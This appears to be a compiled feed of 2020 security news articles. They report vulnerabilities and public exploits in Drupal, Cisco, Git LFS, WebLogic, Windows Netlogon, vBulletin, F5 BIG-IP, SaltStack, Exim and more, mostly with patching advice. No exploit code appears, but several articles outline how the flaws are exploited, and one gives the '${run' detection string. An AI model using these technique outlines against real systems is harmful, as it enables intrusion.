Out-of-band Drupal security updates fix bugs with known exploits

Drupal has released out-of-band security updates to fix two critical code execution flaws (CVE-2020-28948, CVE-2020-28949) in Drupal core, as “there are known exploits for one of core’s dependencies and some configurations of Drupal are vulnerable.”

CVE-2020-28948 CVE-2020-28949

The vulnerabilities (CVE-2020-28948, CVE-2020-28949)

CVE-2020-28948 and CVE-2020-28949 are arbitrary PHP code execution vulnerabilities found in the open source PEAR Archive_Tar library, which Drupal uses to handle TAR files in PHP.

“(The) vulnerabilities are possible if Drupal is configured to allow .tar, .tar.gz, .bz2, or .tlz file uploads and processes them,” the Drupal Security Team explained. Thus, preventing untrusted users from uploading these types of files serves as mitigation.

But, as the maintainers of the library have updated it with fixes, the Drupal team has already implemented it and the best course of action for users is upgrade their Drupal installation to versions 9.0.9, 8.9.10, 8.8.12, or 7.75 (depending on which branch they use).

The “known exploits” the Drupal team referenced can be found here.

They also pointed out that these newly patched vulnerabilities aren’t connected to some of those patched nearly a year ago, though “similar configuration changes may mitigate the problem until you are able to patch.”

This is the second time in the span of a week that the Drupal core receives security updates: the earlier ones fixed a code execution vulnerability (CVE-2020-13671) that could have been triggered by malicious files with a double extension.

The effectiveness of vulnerability disclosure and exploit development

New research into what happens after a new software vulnerability is discovered provides an unprecedented window into the outcomes and effectiveness of responsible vulnerability disclosure and exploit development.

effectiveness vulnerability disclosure

The analysis of 473 publicly exploited vulnerabilities challenges long-held assumptions of the security space – namely, disclosure of exploits before a patch is available does not create a sense of urgency among companies to fix the problem.

The research was conducted by Kenna Security and the Cyentia Institute. It examines how the common practices among security researchers impact the overall security of corporate IT networks.

The importance of timing

The analysis found that when exploit code is made public prior to the release of a patch, cybercriminals get a critical head start. At the same time, when exploits are released before patches, it takes security teams more time to address the problem, even after the patch is released.

“The debate over responsible disclosure has existed for decades, but this data provides an objective correlation between vulnerability discovery, disclosure, and patch delivery for the first time ever,” said Ed Bellis, CTO of Kenna Security.

“However, the results raise several questions about responsible exposure, demonstrating that the timing of exploit code release can shift the balance in favor of attackers or defenders.”

Whether exploit code is released first or a patch is released first, the research found that there are periods of time when attackers have the momentum and when defenders have momentum – a reflection of the fact that no matter when a patch is released, some companies simply don’t or can’t install it before attackers make their move.

For approximately nine of the 15 months studied in this analysis, attackers were able to exploit vulnerabilities at a higher rate than defenders were patching, while defenders had the upper hand for six months.

The vulnerability disclosure practice

At the heart of the vulnerability disclosure practice is a mix of competing incentives for software publishers, IT teams, and the independent security researchers that find software vulnerabilities.

When a vulnerability is found, researchers disclose its existence and the relevant code they used to exploit the application. The publisher sets about creating a patch and pushing the patch to its user base. Occasionally, however, software publishers don’t engage, declining to create a patch or notify users of a vulnerability.

In these cases, researchers will publicly disclose the vulnerability to warn the larger community and spur the publisher to take action. Google, for example, tells software publishers that it will release details of the vulnerabilities it discovers within 90 days of notification, except in a few scenarios.

Additional findings

  • When exploit code is publicly released before a patch, attackers get, on average, a 47 day head start
  • Only 6% of those exploits were detected by more than 1/100 organizations
  • Exploit code was already available for over 50% of the vulnerabilities in our sample by the time they were published to the CVE List
  • In great news for defenders, over 80% of exploited vulnerabilities have a patch available prior to, or along with, CVE publication
  • About one-third of vulnerabilities have exploit code published before a patch is made available
  • About 7% of vulnerabilities are exploited before a CVE is published, a patch is available, and exploit code is released

“For decision-makers and researchers across the cybersecurity community, this research provides a vital, never before seen window into the lifecycle of vulnerabilities and exploitations,” said Jay Jacobs, partner, Cyentia Institute.

“These findings offer prominent paths for future research that could ultimately make the IT infrastructure more secure.”

Despite the strong relationship between disclosure of exploitation code and weaponization, the research requires some caveats. It’s possible that release of exploit code doesn’t facilitate exploitation, but detection of exploits in the wild, because the release of the code enabled faster creation of anti-virus signatures.

“This new report reignites the conversation on responsible disclosure. More research will help draw more definitive conclusions, but for now, we can say that where there’s smoke, there’s fire,” said Wade Baker, partner and co-founder of Cyentia Institute. “Release of exploit code before a patch seems to have a negative effect on corporate security.”

Critical vulnerabilities in Cisco Security Manager fixed, researcher discloses PoCs

Cisco has patched two vulnerabilities in its Cisco Security Manager solution, both of which could allow unauthenticated, remote attackers to gain access to sensitive information on an affected system.

Cisco Security Manager vulnerabilities

Those are part of a batch of twelve vulnerabilities flagged in July 2020 by Florian Hauser, a security researcher and red teamer at Code White.

About the Cisco Security Manager vulnerabilities

Cisco Security Manager is a security management application that provides insight into and control of Cisco security and network devices deployed by enterprises – security appliances, intrusion prevention systems, firewalls, routers, switches, etc.

Cisco has fixed two vulnerabilities affecting Cisco Security Manager v4.21 and earlier, by pushing out v4.22:

  • CVE-2020-27130, a critical path traversal vulnerability that could be exploited by sending a crafted request to the affected device and could result in the attacker downloading arbitrary files from it
  • CVE-2020-27125, which could allow an attacker to view static credentials in the solution’s source code

Cisco has also simultaneously announced that it will fix multiple Java deserialization vulnerabilities (collectively designated as CVE-2020-27131) in the upcoming v4.23 of the Cisco Security Manager solution. Those could allow unauthenticated, remote attackers to execute arbitrary commands on an affected instance and could be triggered by sending a malicious serialized Java object to a specific listener on an affected system.

The company’s Product Security Incident Response Team (PSIRT) has noted that public announcements about all these vulnerabilities are available, but that they are “not aware” of instances of actual malicious use in the wild.

The public announcements they are referring to is a post on Gist, a pastebin service operated by GitHub, through which Hauser shared PoCs for the flaws he discovered and flagged.

Git LFS vulnerability allows attackers to compromise targets’ Windows systems (CVE-2020-27955)

A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool, security researcher Dawid Golunski has discovered.


It can be exploited in a variety of popular Git clients in their default configuration – GitHub CLI, GitHub Desktop, SmartGit, SourceTree, GitKraken, Visual Studio Code, etc. – and likely other clients/development IDEs (i.e., those install git with the Git LFS extension by default).

“Web applications / hosted repositories running on Windows which allow users to import their repositories from a URL may also be exposed to this vulnerability,” Golunski added.

About the vulnerability (CVE-2020-27955)

Golunski found that Git LFS does not specify a full path to git binary when executing a new git process via a specific exec.Command() function.

“As the exec.Command() implementation on Windows systems include the current directory, attackers may be able to plant a backdoor in a malicious repository by simply adding an executable file named: git.bat, git.exe, git.cmd or any other extension that is used on the victim’s system (PATHEXT environment dependent), in the main repo’s directory. As a result, the malicious git binary planted in this way will get executed instead of the original git binary located in a trusted path,” he explained.

The vulnerability can be triggered if the victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool.

Golunski says that CVE-2020-27955 is trivial to exploit, and has released PoC exploit code, as well as video demonstrations of the exploit in action on various Git clients.

What to do?

The vulnerability affects Git LFS versions 2.12 or earlier on Windows systems (but not on Unix). According to the Git LFS maintainers, there is no workaround for this issue other than avoiding untrusted repositories.

Affected users and product vendors are advised to update to the latest Git LFS version (v2.12.1, released on Wednesday), which plugged the security hole. Git for Windows has also been updated to include this Git LFS version.

Google fixes two actively exploited Chrome zero-days (CVE-2020-16009, CVE-2020-16010)

For the third time in two weeks, Google has patched Chrome zero-day vulnerabilities that are being actively exploited in the wild: CVE-2020-16009 is present in the desktop version of the browser, CVE-2020-16010 in the mobile (Android) version. About the vulnerabilities (CVE-2020-16009, CVE-2020-16010) As per usual, Google has refrained from sharing much detail about each of the patched vulnerabilities, so all we know is this: CVE-2020-16009 is an inappropriate implementation flaw in V8, Chrome’s open source … More

The post Google fixes two actively exploited Chrome zero-days (CVE-2020-16009, CVE-2020-16010) appeared first on Help Net Security.

Easily exploitable RCE in Oracle WebLogic Server under attack (CVE-2020-14882)

A critical and easily exploitable remote code execution vulnerability (CVE-2020-14882) in Oracle WebLogic Server is being targeted by attackers, SANS ISC has warned.


Oracle WebLogic is a Java EE application server that is part of Oracle’s Fusion Middleware portfolio and supports a variety of popular databases. These servers are often targeted by attackers, whether for cryptocurrency mining or as a way into other enterprise systems.

About the vulnerability (CVE-2020-14882)

CVE-2020-14882 may allow unauthenticated attackers with network access via HTTP to achieve total compromise and takeover of vulnerable Oracle WebLogic Servers.

The vulnerability affects Oracle WebLogic Server versions,,, and, and has been patched by Oracle last week.

Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, said that SANS ISC’s honeypots are getting hit by exploit attempts originating from four IP addresses.

For now, the attackers are only probing to see whether the target systems are vulnerable, but that’s likely because the honeypots did not return the “correct” response.

“The exploit appears to be based on this blog post published in Vietnamese by ‘Jang’,” he added. (The researcher in question has previously flagged several flaws in Oracle’s offerings, though not this one.)

The exploit allows attackers to achieve RCE on a vulnerable Oracle WebLogic Server by sending one simple POST request.

A demonstration of the exploit in action is available here.

The PoC exploit was published yesterday, and it didn’t take long for attackers to take advantage of it. Admins are advised to patch vulnerable systems as soon as possible.

Attacks on IoT devices continue to escalate

Attacks on IoT devices continue to rise at an alarming rate due to poor security protections and cybercriminals use of automated tools to exploit these vulnerabilities, according to Nokia.

attacks IoT devices

IoT devices most infected

The report found that internet-connected, or IoT, devices now make up roughly 33% of infected devices, up from about 16% in 2019. The report’s findings are based on data aggregated from monitoring network traffic on more than 150 million devices globally.

Adoption of IoT devices, from smart home security monitoring systems to drones and medical devices, is expected to continue growing as consumers and enterprises move to take advantage of the high bandwidth, ultra-low latency, and fundamentally new networking capabilities that 5G mobile networks enable, according to the report.

The rate of success in infecting IoT devices depends on the visibility of the devices to the internet, according to the report. In networks where devices are routinely assigned public facing internet IP addresses, a high infection rate is seen.

In networks where carrier-grade Network Address Translation is used, the infection rate is considerably reduced, because the vulnerable devices are not visible to network scanning.

Cybercriminals taking advantage of the pandemic

The report also reveals there is no let up in cybercriminals using the COVID-19 pandemic to try to steal personal data through a variety of types of malware. One in particular is disguised as a Coronavirus Map application – mimicking the legitimate and authoritative Coronavirus Map issued by Johns Hopkins University – to take advantage of the public’s demand for accurate information about COVID-19 infections, deaths and transmissions.

But the bogus application is used to plant malware on victims’ computers to exploit personal data. “Cybercriminals are playing on people’s fears and are seeing this situation as an opportunity to promote their agendas,” the report says. The report urges the public to install applications only from trusted app stores, like Google and Apple.

Bhaskar Gorti, President and Chief Digital Officer, Nokia, said: “The sweeping changes that are taking place in the 5G ecosystem, with even more 5G networks being deployed around the world as we move to 2021, open ample opportunities for malicious actors to take advantage of vulnerabilities in IoT devices.

“This report reinforces not only the critical need for consumers and enterprises to step up their own cyber protection practices, but for IoT device producers to do the same.”

Are your domain controllers safe from Zerologon attacks?

CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) for which Microsoft released a patch in August, has just become a huge liability for organizations that are struggling with timely patching.

Secura researchers – the very same ones who found and disclosed the flaw to Microsoft – have published additional technical details on Monday, and just a few hours later several PoC exploit/tools have been published on GitHub.


About CVE-2020-1472

CVE-2020-1472 (aka Zerologon) affects all supported Windows Server versions, but the danger is highest for servers that function as Active Directory domain controllers in enterprise networks.

The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol.

“By simply sending a number of Netlogon messages in which various fields are filled with zeroes, an attacker can change the computer password of the domain controller that is stored in the AD. This can then be used to obtain domain admin credentials and then restore the original DC password,” Secura researchers explained.

“This attack has a huge impact: it basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain. The attack is completely unauthenticated: the attacker does not need any user credentials.”

“In a hypothetical attack, one could use this vulnerability to deploy ransomware throughout an organization and maintain a persistent presence if cleanup and restoration efforts miss any additional malicious scripts,” Tenable security response manager Ryan Seguin noted.

“Organizations with network-accessible backups could end up with a perfect storm if a ransomware group destroys backups to increase their likelihood of payout from the victim organization.”


Many PoC exploits have been released security researchers in the past day (1, 2, 3, 4), and the effectiveness of some of them has been confirmed:

Secura researchers published a Python script organizations can used to check whether a domain controller is vulnerable or not.


Systems that have received the patch released in August are safe from attack, as it enforces secure NRPC for all Windows servers and clients in the domain. All Active Directory domain controllers should be updated, including read-only domain controllers.

“The updates will enable the Domain Controllers (DCs) to protect Windows devices by default, log events for non-compliant device discovery, and have the option to enable protection for all domain-joined devices with explicit exceptions,” Microsoft explained.

But complete remediation will happen after organizations deploy Domain Controller (DC) enforcement mode, which requires all Windows and non-Windows devices to use secure NRPC or to explicitly allow the account by adding an exception for any non-compliant device.

While organization can deploy DC enforcement mode immediately by enabling specific registry key, on February 9, 2021, DCs will be placed in enforcement mode automatically.

This phased rollout is due to the fact that there are many non-Windows device implementations of the Netlogon Remote Protocol, and vendors of non-compliant implementations have been given enough time to provide customers with the needed updates.

New attack vectors make securing virtual companies even more challenging

As organizations are settling into long-term remote working, new attack vectors for opportunistic cyberattackers—and new challenges for network administrators have been introduced, Nuspire reveals.

attack vectors virtual organization

Now six months into the pandemic, attackers pivoted away from COVID-19 themes, instead utilizing other prominent media themes like the upcoming U.S. election to wreak havoc.

Increase in both botnet and exploit activity

There was an increase in both botnet and exploit activity over the course of Q2 2020 by 29% and 13% respectively—that’s more than 17,000 botnet and 187,000 exploit attacks a day.

While attackers targeted remote work technology at the source to obtain access to the enterprise in Q1 2020, there was a shift in tactics to leverage botnets to obtain a foothold in the network. Home routers typically are not monitored by IT teams therefore have become a viable attack method that avoids detection while infiltrating corporate networks.

“Today, the pandemic has complicated an already complex threat landscape. CISOs are under great pressure to ensure their virtual organizations are secure,” said Lewie Dunsworth, CEO of Nuspire.

“Threat vectors will continue to evolve as the uncertainty of our world continues to play out. That’s why our team analyzes the latest threat intelligence daily and uses this data to engage in proactive threat hunting and response to ensure our clients have the upper hand.”

Additional findings

  • The ZeroAccess botnet made a resurgence in Q2, coming in second for most used botnet. ZeroAccess was originally terminated in 2013 but has made rare resurgences over the last seven years.
  • There was a significant spike (1,310% peak mid-quarter) in exploit attempts against Shellshock, an exploit discovered in 2014, demonstrating that attackers attempt to exploit old vulnerabilities to catch old operating systems and unpatched systems.
  • A new signature, dubbed MSOffice Sneaky that was released during Q2 has been identified. Documents containing malicious macros that reach out to command and control servers to download a malware of the attackers choosing. This attack vector is increasingly dangerous, especially when remote employees disconnect from their VPN.
  • DoublePulsar, the exploit developed by the NSA, continues to dominate the exploit chart, consisting of 72% of all exploit attempts witnessed at Nuspire.

Exploits for vBulletin zero-day released, attacks are ongoing

The fix for CVE-2019-16759, a remote code execution vulnerability in vBulletin that was patched in September 2019, is incomplete, security researcher Amir Etemadieh has discovered.

The discovery and his publishing of PoC and full exploits spurred attackers to launch attacks:

Several other admins confirmed that they’ve been hit.

Risk mitigation and prevention

Etemadieh explained how he discovered that the patch for CVE-2019-16759 was flawed in a blog post published on Sunday.

It’s a quality write-up and contains a one-line PoC exploit and full exploits written Bash, Python and Ruby, as well as instructions on how to implement a fix until a more complete patch is released (in short, forum admins were advised to temporarily disable PHP widgets).

“Tenable Research has tested the proof of concept from Etemadieh and confirmed successful exploitation using the latest version of vBulletin,” Tenable research engineer Satnam Narang confirmed .

Internet Brands, the makers of vBulletin, have not been notified of this discovery prior to the publication, so they’ve scrambled to fix the flaw again.

New patches have been made available on Monday, for versions 5.6.2, 5.6.1 and 5.6.0 of vBulletin Connect, and they disable the PHP Module widget. The upcoming v5.6.3 will contain the patch.

“All older versions should be considered vulnerable. Sites running older versions of vBulletin need to be upgraded to vBulletin 5.6.2 as soon as possible,” they advised, and noted that vBulletin Cloud sites are not affected by this issue.

vBulletin is the most popular internet forum software in use today and also powers many dark web forums. vBulletin flaws, especially when they allow remote code execution without authentication, are usually speedily leveraged by attackers, so admins are advised to implement the patches ASAP.

Critical ManageEngine ADSelfService Plus RCE flaw patched

A critical vulnerability (CVE-2020-11552) in ManageEngine ADSelfService Plus, an Active Directory password-reset solution, could allow attackers to remotely execute commands with system level privileges on the target Windows host.


About ManageEngine ADSelfService Plus

ManageEngine ADSelfService Plus is developed by ManageEngine, a division of Zoho Corporation, a software development company that focuses on web-based business tools and information technology.

“ADSelfService Plus supports self-service password reset for WFH and remote users by enabling users to reset Windows password from their own machines and updating the cached credentials through a VPN client,” the company touts.

It also supports sending password expiration notifications to remote users through email, SMS, and push notifications; provides admins with a way to force 2-factor authentication for Windows logons; and provides users with secure access to all SAML-supported enterprise applications (e.g., Office 365, G Suite, Salesforce) through AD-based single sign-on.

About the vulnerability (CVE-2020-11552)

Unearthed and flagged by Bhadresh Patel, CVE-2020-11552 stems from the solution not properly enforcing user privileges associated with Windows Certificate Dialog.

The ManageEngineADSelfService Plus thick client software enables users to perform a password reset or an account unlock action by using self-service option on the Windows login screen. When one of these options is selected, the client software is launched and connects to a remote ADSelfServicePlus server to facilitate the self-service operations.

“A security alert can/will be triggered when ‘an unauthenticated attacker having physical access to the host issues a self-signed SSLcertificate to the client’. Or, ‘a (default) self-signed SSLcertificate is configured on ADSelfService Plus server’,” he noted.

“‘ViewCertificate’ option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through ‘C:windowssystem32’, acmd.exe can be launched as a SYSTEM.”

Patel also published a PoC exploit video (the exploitation part starts at 5:30):

[embedded content]

ManageEngine patched CVE-2020-11552 twice, because the first patch only fixed the issue partially. Admins are advised to upgrade to ADSelfService Plus build 6003, which contains the complete security fix.

Attackers are exploiting Cisco ASA/FTD flaw in search for sensitive data

An unauthenticated file read vulnerability (CVE-2020-3452) affecting Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software is being exploited by attackers in the wild.


For the moment, it seems that it is being used just to read LUA source files, but it can be used to view files that may contain information such as WebVPN configuration, bookmarks, web cookies, partial web content, and HTTP URLs.

About the vulnerability (CVE-2020-3452)

CVE-2020-3452 affects the web services interface of Cisco ASA and Cisco FTD software and can be exploited by remote unauthenticated attackers to read sensitive files within the web services file system on the targeted device (but not to obtain access to ASA or FTD system files or underlying operating system files).

“The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,” Cisco explained.

Devices are vulnerable only if they are running a vulnerable release of the software AND are configured with either WebVPN or AnyConnect features.

The vulnerability was discovered by Mikhail Klyuchnikov of Positive Technologies and Abdulrahman Nour and Ahmed Aboul-Ela of RedForce. Cisco patched it last week by releasing security updates and hotfixes. Shortly after, Aboul-Ela published a PoC for it:

Cisco confirmed that wxploitation attempts started the day after. Rapid7 scanned the internet-accessible ASA/FTD devices and found 85,000.

“Since it is difficult (if not impossible) to legally fingerprint Cisco ASA/FTD versions remotely, Rapid7 Labs revisited the ‘uptime’ technique described in a 2016 blog post for another Cisco ASA vulnerability, which shows that only about 10% of Cisco ASA/FTD devices have been rebooted since the release of the patch. This is a likely indicator they’ve been patched,” noted Bob Rudis, Chief Data Scientist at Rapid7.

Attackers are probing Citrix controllers and gateways through recently patched flaws

Earlier this week, Citrix released security updates for Citrix Application Delivery Controller (ADC), Citrix Gateway, and the Citrix SD-WAN WANOP appliance, and urged admins to apply them as soon as possible to reduce risk.

Citrix ADC gateway

At the time, there was no public attack code and no indication that any of the fixed flaws were getting actively exploited.

On Thursday, though, SANS ISC’s Dr. Johannes Ullrich spotted attackers attempting to exploit two of the Citrix vulnerabilities on his F5 BigIP honeypot (set up to flag CVE-2020-5902 exploitation attempts).

About the vulnerabilities

The fixed flaws are 11 in total, ranging from information disclosure and DoS bugs to elevation of pivelege, XSS and code injection flaws.

The security advisory Citrix published noted them and laid out the pre-conditions needed for their exploitation, but does not contain too many details.

“We are limiting the public disclosure of many of the technical details of the vulnerabilities and the patches to further protect our customers. Across the industry, today’s sophisticated malicious actors are using the details and patches to reverse engineer exploits. As such, we are taking steps to advise and help our customers but also do what we can to shield intelligence from malicious actors,” Citrix CISO Fermin Serna explained, and made sure to note that the patches provided fully resolve all issues.

He also pointed out that of the 11 vulnerabilities, there are six possible attacks routes, and five of those have barriers to exploitation.

Finally, he added that the vulnerabilities have no link to CVE-2019-19781, the remote code execution flaw that’s been heavily exploited by attackers since late December/early January.

About the recent exploitation attempts

Dr. Ullrich said that they are seeing some scans that are looking for systems that haven’t been patched yet.

“One interesting issue is that most of the scans originate from a single ISP so far, suggesting that this may be just one group at this point trying to enumerate vulnerable systems,” he told Help Net Security.

“Vulnerable systems leak information about the system if hit with these exploits. So these are not as dangerous as the code execution issues we saw with Citrix over new year, or the F5 issues. But enumerating systems, and using the leaked information may lead to additional more targeted follow on attacks later.”

One of the exploited vulnerabilities allows arbitrary file downloads, the other allows retrieval of a PCI-DSS report without authentication.

“Some of the other vulnerabilities patched with this update are ‘interesting’, but more tricky to exploit,” he added.

Attackers are bypassing F5 BIG-IP RCE mitigation – you might want to patch after all

Attackers are bypassing a mitigation for the BIG-IP TMUI RCE vulnerability (CVE-2020-5902) originally provided by F5 Networks, NCC Group’s Research and Intelligence Fusion Team has discovered.

“Early data made available to us, as of 08:05 on July 8, 2020, is showing of ~10,000 Internet exposed F5 devices that ~6,000 were made potentially vulnerable again due to the bypass,” they warned.

F5 Networks has updated the security advisory to reflect this discovery and to provide an updated version of the mitigation. The advisory has also been updated with helpful notes regarding the impact of the flaw, the various mitigations, as well as indicators of compromise.

CVE-2020-5902 exploitation attempts

CVE-2020-5902 was discovered and privately disclosed by Positive Technologies researcher Mikhail Klyuchnikov.

F5 Networks released patches and published mitigations last Wednesday and PT followed with more information.

Security researchers were quick to set up honeypots to detect exploitation attempts and, a few dats later, after several exploits had been made public, they started.

Some were reconnaissance attempts, some tried to deliver backdoors, DDoS bots, coin miners, web shells, etc. Some were attempts to scrape admin credentials off vulnerable devices in an automated fashion.

There’s also a Metasploit module for CVE-2020-5902 exploitation available (and in use).

What now?

Any organization that applied the original, incomplete mitigation instead of patching their F5 BIG-IP boxes should take action again:

They should also check whether their devices have been compromised in the interim.

Attackers are breaching F5 BIG-IP devices, check whether you’ve been hit

Attackers are actively trying to exploit CVE-2020-5902, a critical vulnerability affecting F5 Networks‘ BIG-IP multi-purpose networking devices, to install coin-miners, IoT malware, or to scrape administrator credentials from the hacked devices.

exploit CVE-2020-5902

About CVE-2020-5902

CVE-2020-5902 is a critical remote code execution vulnerability in the configuration interface (aka Traffic Management User Interface – TMUI) of BIG-IP devices used by some of the world’s biggest companies.

It was unearthed along with CVE-2020-5903, a less critical XSS vulnerability that enables running malicious JavaScript code as the logged-in user on BIG-IP devices, by Positive Technologies researcher Mikhail Klyuchnikov.

To exploit CVE-2020-5902, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.

“By exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution. The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,” the researcher noted.

“RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the internet.”

Shodan shows around 8,500 vulnerable devices available on the internet, nearly 40% of which are in the U.S.

Active exploitation

F5 Networks published security advisories for both flaws last Wednesday, just as the U.S. was looking forward to the long Independence Day weekend.

Both the company and the U.S. Cyber Command urged admins on Friday to check whether their F5 BIG-IP web interfaces were exposed on the internet and to implement the offered patches before the weekend starts.

At the time, there was no public exploit available for CVE-2020-5902, but some soon became available. A Metasploit module is also in the works.

Finally, opportunistic mass scanning for vulnerable devices started during the weekend, and exploits started being leveraged by various attackers:

What to do?

According to F5 Networks, BIG-IP networking devices are used as server load balancers, application delivery controllers, access gateways, etc. by 48 of the Fortune 50 companies. They are used by ISPs and governments.

As noted before, F5 Networks released fixed software versions last week as well as helpful risk mitigation advice if patching is impossible at this moment.

For organizations that didn’t get around to any of it, Microsoft cybersecurity pro Kevin Beaumont offers the following advice:

SANS ISC handler Dider Stevens has also provided helpful links and advice.

VMware Cloud Director vulnerability enables a full cloud infrastructure takeover

A code injection vulnerability (CVE-2020-3956) affecting VMware vCloud Director could be exploited to take over the infrastructure of cloud services, Citadelo researchers have discovered.


About VMware vCloud Director and CVE-2020-3956

VMware Cloud Director (formerly known as vCloud Director) is a cloud service delivery platform used by public and private cloud providers to operate and manage cloud infrastructure.

CVE-2020-3956 was discovered by Citadelo penetration testers during a security audit of a customer’s VMWare Cloud Director-based cloud infrastructure.

“An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access,” VMware explained in a security advisory published on May 19, after the company finished releasing patches for several versions of vCloud Director.

The researchers have provided more details about the vulnerability, explained how it can be exploited, and shared an exploit.

The damage attackers can do after exploiting the flaw is substantial. They can:

  • View content of the internal system database, including password hashes of any customers allocated to this infrastructure
  • Modify the system database to steal foreign virtual machines (VM) assigned to different organizations within Cloud Director
  • Escalate privileges from “Organization Administrator” (normally a customer account) to “System Administrator” with access to all cloud accounts (organization) as an attacker can change the hash for this account
  • Modify the login page to Cloud Director, which allows the attacker to capture passwords of another customer in plaintext, including System Administrator accounts
  • Read other sensitive data related to customers.

The vulnerability has been patched

The vulnerability was privately reported to VMware, and has been addressed in April and May.

VMware considers the flaw to be “important” and not “critical”, since an attacker must be authenticated in order to exploit CVE-2020-3956. But, as the researchers noted, “cloud providers offering a free trial to potential new customers using VMware Cloud Director are at high risk because an untrusted actor can quickly take advantage.”

Admins are advised to upgrade to vCloud Director versions,, or to plug the security hole. A workaround is also available for those that can’t upgrade to a recommended version (temporarily or ever).

VMware Cloud Director v10.1.0 and vCloud Director versions 9.0.x and 8.x are not affected by the flaw.

Hackers breached six Cisco servers through SaltStack Salt vulnerabilities

Earlier this month, when F-Secure publicly revealed the existence of two vulnerabilities affecting SaltStack Salt and attackers started actively exploiting them, Cisco was among the victims.

Cisco SaltStack Salt

The revelation was made on Thursday, when Cisco published an advisory saying that, on May 7, 2020, they’ve discovered the compromise of six of their salt-master servers, which are part of the Cisco VIRL-PE (Internet Routing Lab Personal Edition) service infrastructure.

About SaltStack Salt, the vulnerabilities, and the problem with patching

SaltStack Salt is open source software that is used for managing and monitoring servers in datacenters and cloud environments. It is installed on a “master” server and it manages “minion” servers via an API agent.

The two recently revealed vulnerabilities – CVE-2020-11651 (an authentication bypass flaw) and CVE-2020-11652 (a directory traversal flaw) – can be exploited by unauthenticated, remote attackers to achieve RCE as root on both masters and minions.

The flaws were fixed in late April, but not all exposed Salt servers have been patched. A few weeks ago, Censys put the number of potentially vulnerable, internet-exposed Salt servers at 2,928.

One of the things that likely prolonged the deployment of patches is the fact that Salt is integrated in other solutions, and developers of those solutions took some time to push out security updates.

VMware vRealize Operations Manager is one of those solutions, and so are two network architecture modeling and testing solutions by Cisco.

Cisco’s breach

“Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities,” Cisco shared.

“Cisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE. Those servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.”

The company has remediated the affected servers on the same day and has provided software updates that address these vulnerabilities, so that enterprise admins that installed these solutions on-premises can fix them.

For more information about which software releases are affected and under what conditions, admins should peruse the advisory, which also offers some workarounds.

Cisco did not say what the attackers ultimate goal was, but in previously disclosed attacks, their intent was to install cryptocoin miners.

NSA warns about Sandworm APT exploiting Exim flaw

The Russian APT group Sandworm has been exploiting a critical Exim flaw (CVE-2019-10149) to compromise mail servers since August 2019, the NSA has warned in a security advisory published on Thursday.

Sandworm CVE-2019-10149

“When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain,” they said.

The script would then attempt to add privileged users, disable network security settings, update SSH configurations to enable additional remote access, and execute an additional script to enable follow-on exploitation.

About Exim and the flaw

Exim is a mail transfer agent (MTA) that is commonly used for Unix-based systems and comes pre-installed on some Linux distributions.

It is the most widely used MTA and is deployed on over half of all Internet-facing mail servers.

While its efficient and highly configurable, its widespread use makes it a common target for attackers, who are always on the lookout for vulnerabilities that can be exploited. And, in Q2 2019, there were a few, including the most critical one: CVE-2019-10149.

Its existence was disclosed in June 2019, after a patch was provided for the supported versions and for a few that are now supported anymore.

Soon after, attackers started exploiting it to compromise Linux servers and instal cryptocoin miners on them, and Microsoft warned about a Linux worm leveraging the flaw to target Azure virtual machines (VMs) running affected versions of Exim.

Mitigation and detection

The NSA has provided mitigation advice as well as indicators of compromise so that organizations can protect themselves and check whether they’ve been targeted by the Sandworm attackers (aka the BlackEnergy APT, aka Telebots), which have in the past been linked to cyber-espionage campaigns targeting NATO, the EU, the White House, a variety of US ICS operators, and Ukranian energy companies, organizations in the financial sector and news media companies.

First and foremost, admins are advised to update their Exim installations to the latest stable release (v4.93) to mitigate this and other vulnerabilities.

“Other vulnerabilities exist and are likely to be exploited, so the latest fully patched version should be used,” the NSA said, and advised system administrators to continually check software versions and update as new versions become available.

“The actors exploited victims using Exim software on their public facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message,” they explained.

Sandworm CVE-2019-10149

Admins and IT security employees can detect and/or block exploitation of the flaw by using specific Snort rules, check traffic logs for emails with a recipient containing “${run”, and routinely check for unauthorized system modifications.

The NSA provided IP addresses and domains that were associated with the Sandworm attacks and offered additional advice on how to apply multiple defensive layers to protect public facing software such as MTAs.

Despite lower number of vulnerability disclosures, security teams have their work cut out for them

The number of vulnerabilities disclosed in Q1 2020 has decreased by 19.8% compared to Q1 2019, making this likely the only true dip observed within the last 10 years, Risk Based Security reveals.

vulnerabilities disclosed Q1 2020

Vulnerabilities of interest disclosed in Q1 2020

Vulnerabilities disclosed in Q1 2020: What happened?

